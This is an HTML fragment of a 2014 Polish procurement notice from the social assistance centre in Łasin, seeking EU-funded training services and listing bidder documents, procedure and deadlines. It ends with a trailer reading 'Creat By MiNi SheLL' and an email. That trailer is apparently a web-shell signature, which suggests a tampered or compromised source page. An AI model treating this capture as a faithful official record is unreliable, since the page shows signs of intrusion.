<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">poświadczenia, referencje, protokoły odbioru itp.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
1)w zakresie przedłużenia terminu wykonania przedmiotu umowy, z powodu wystąpienia siły wyższej tj. zdarzenia pochodzącego z zewnątrz, którego skutków nie dało się przewidzieć ani zapobiec przy zachowaniu należytej staranności,
2)w innym zakresie niż przedłużenie terminu wykonania przedmiotu umowy, z powodu:
a)zmiany przepisów, które mają wpływ na wykonanie przedmiotu umowy,
b)zmiany podwykonawców, przy udziale których Wykonawca będzie wykonywał przedmiot umowy, wskazanych w załączniku nr 3 do umowy,
c)zmian w harmonogramie szkoleń-kursów wynikających z ewentualnych zmian w Projekcie systemowym pn. Pomysł na aktywność.
2.Zamawiający zastrzega sobie możliwość zmiany konkretnych uczestników szkolenia oraz rodzajów szkoleń spośród objętych SIWZ lub rezygnację z danego szkolenia-kursu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lasin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko Gminny Ośrodek Pomocy Społecznej, 86- 320 Łasin, ul. Radzyńska 2,
pokój nr 14..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2014 godzina 12:00, miejsce: Miejsko Gminny Ośrodek Pomocy Społecznej, 86- 320 Łasin, ul. Radzyńska 2,
pokój nr 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia są usługi w zakresie szkoleń dla osób zakwalifikowanych do udziału w projekcie systemowym Pomysł na aktywność realizowanego przez MGOPS w Łasinie, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Projekt realizowany w ramach PO KL Priorytetu VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com